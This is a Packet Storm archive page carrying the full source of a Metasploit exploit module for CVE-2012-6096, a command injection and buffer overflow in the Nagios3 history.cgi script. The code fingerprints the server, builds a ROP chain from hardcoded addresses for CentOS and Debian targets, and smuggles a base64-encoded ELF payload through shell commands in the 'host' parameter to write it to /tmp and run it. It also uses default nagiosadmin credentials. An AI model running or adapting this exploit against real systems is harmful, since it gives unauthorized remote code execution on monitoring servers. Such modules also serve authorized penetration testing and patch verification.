exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Nagios3 history.cgi Host Command Execution

Nagios3 history.cgi Host Command Execution
Posted Jan 17, 2013
Authored by Blasty, temp66, Jose Selvi | Site metasploit.com

This Metasploit module abuses a command injection vulnerability in the Nagios3 history.cgi script.

tags | exploit, cgi
advisories | CVE-2012-6096, OSVDB-88322
SHA-256 | 2d998e6af394b654b4e6c4d7e3889f719c9559d52bd93cdc30862fc829af9295

Nagios3 history.cgi Host Command Execution

Change Mirror Download
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE

def initialize(info = {})
super(update_info(info,
'Name' => 'Nagios3 history.cgi Host Command Execution',
'Description' => %q{
This module abuses a command injection vulnerability in the
Nagios3 history.cgi script.
},
'Author' => [
'Unknown <temp66@gmail.com>', # Original finding
'blasty <blasty@fail0verflow.com>', # First working exploit
'Jose Selvi <jselvi@pentester.es>', # Metasploit module
'Daniele Martini <cyrax[at]pkcrew.org>' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2012-6096' ],
[ 'OSVDB', '88322' ],
[ 'BID', '56879' ],
[ 'EDB', '24084' ],
[ 'URL', 'http://lists.grok.org.uk/pipermail/full-disclosure/2012-December/089125.html' ]
],
'Platform' => ['unix', 'linux'],
'Arch' => [ ARCH_X86 ],
'Privileged' => false,
'Payload' =>
{
'Space' => 200, # Due to a system() parameter length limitation
'BadChars' => '', # It'll be base64 encoded
},
'Targets' =>
[
[ 'Automatic Target', { 'auto' => true }],
# NOTE: All addresses are from the history.cgi binary
[ 'Appliance Nagios XI 2012R1.3 (CentOS 6.x)',
{
'BannerRE' => 'Apache/2.2.15 (CentOS)',
'VersionRE' => '3.4.1',
'Arch' => ARCH_X86,
'Offset' => 0xc43,
'RopStack' =>
[
0x0804c260, # unescape_cgi_input()
0x08048f04, # pop, ret
0x08079b60, # buffer addr
0x08048bb0, # system()
0x08048e70, # exit()
0x08079b60 # buffer addr
]
}
],
[ 'Debian 5 (nagios3_3.0.6-4~lenny2_i386.deb)',
{
'BannerRE' => 'Apache/2.2.9 (Debian)',
'VersionRE' => '3.0.6',
'Arch' => ARCH_X86,
'Offset' => 0xc37,
'RopStack' =>
[
0x0804b620, # unescape_cgi_input()
0x08048fe4, # pop, ret
0x080727a0, # buffer addr
0x08048c7c, # system()
0xdeafbabe, # if should be exit() but it's not
0x080727a0 # buffer addr
]
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Dec 09 2012'))

register_options(
[
OptString.new('TARGETURI', [true, "The full URI path to history.cgi", "/nagios3/cgi-bin/history.cgi"]),
OptString.new('USER', [false, "The username to authenticate with", "nagiosadmin"]),
OptString.new('PASS', [false, "The password to authenticate with", "nagiosadmin"]),
], self.class)
end

def detect_version(uri)
# Send request
res = send_request_cgi({
'method' => 'GET',
'uri' => uri,
'headers' => { 'Authorization' => 'Basic ' + Rex::Text.encode_base64("#{datastore['USER']}:#{datastore['PASS']}") },
}, 10)

# Error handling
if res.nil?
print_error("Unable to get a response from the server")
return nil, nil
end
if(res.code == 401)
print_error("Please specify correct values for USER and PASS")
return nil, nil
end
if(res.code == 404)
print_error("Please specify the correct path to history.cgi in the URI parameter")
return nil, nil
end

# Extract banner from response
banner = res.headers['Server']

# Extract version from body
version = nil
version_line = res.body.match(/Nagios&reg; (Core&trade; )?[0-9.]+ -/)
if not version_line.nil?
version = version_line[0].match(/[0-9.]+/)[0]
end

# Check in an alert exists
alert = res.body.match(/ALERT/)

return version, banner, alert
end

def select_target(version, banner)

# No banner and version, no target
if banner.nil? or version.nil?
return nil
end

# Get version information
print_status("Web Server banner: #{banner}")
print_status("Nagios version detected: #{version}")

# Try regex for each target
self.targets.each do |t|
if t['BannerRE'].nil? or t['VersionRE'].nil? # It doesn't exist in Auto Target
next
end
regexp1 = Regexp.escape(t['BannerRE'])
regexp2 = Regexp.escape(t['VersionRE'])
if ( banner =~ /#{regexp1}/ and version =~ /#{regexp2}/ ) then
return t
end
end
# If not detected, return nil
return nil
end

def check
print_status("Checking banner and version...")
# Detect version
banner, version, alert = detect_version(target_uri.path)
# Select target
mytarget = select_target(banner, version)

if mytarget.nil?
print_error("No matching target")
return CheckCode::Unknown
end

if alert.nil?
print_error("At least one ALERT is needed in order to exploit")
return CheckCode::Detected
end

return CheckCode::Vulnerable
end

def exploit
# Automatic Targeting
mytarget = nil
banner, version, alert = detect_version(target_uri.path)
if (target['auto'])
print_status("Automatically detecting the target...")
mytarget = select_target(banner, version)
if mytarget.nil?
fail_with(Exploit::Failure::NoTarget, "No matching target")
end
else
mytarget = target
end

print_status("Selected Target: #{mytarget.name}")
if alert.nil?
print_error("At least one ALERT is needed in order to exploit, none found in the first page, trying anyway...")
end
print_status("Sending request to http://#{rhost}:#{rport}#{target_uri.path}")

# Generate a payload ELF to execute
elfbin = generate_payload_exe
elfb64 = Rex::Text.encode_base64(elfbin)

# Generate random filename
tempfile = '/tmp/' + rand_text_alphanumeric(10)

# Generate command-line execution
if mytarget.name =~ /CentOS/
cmd = "echo #{elfb64}|base64 -d|tee #{tempfile};chmod 700 #{tempfile};rm -rf #{tempfile}|#{tempfile};"
else
cmd = "echo #{elfb64}|base64 -d|tee #{tempfile} |chmod +x #{tempfile};#{tempfile};rm -f #{tempfile}"
end
host_value = cmd.gsub!(' ', '${IFS}')

# Generate 'host' parameter value
padding_size = mytarget['Offset'] - host_value.length
host_value << rand_text_alphanumeric( padding_size )

# Generate ROP
host_value << mytarget['RopStack'].pack('V*')

# Send exploit
res = send_request_cgi({
'method' => 'GET',
'uri' => target_uri.path,
'headers' => { 'Authorization' => 'Basic ' + Rex::Text.encode_base64("#{datastore['USER']}:#{datastore['PASS']}") },
'vars_get' =>
{
'host' => host_value
}
})

if not res
if session_created?
print_status("Session created, enjoy!")
else
print_error("No response from the server")
end
return
end

if res.code == 401
fail_with(Exploit::Failure::NoAccess, "Please specify correct values for USER and PASS")
end

if res.code == 404
fail_with(Exploit::Failure::NotFound, "Please specify the correct path to history.cgi in the TARGETURI parameter")
end

print_status("Unknown response #{res.code}")
end

end
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close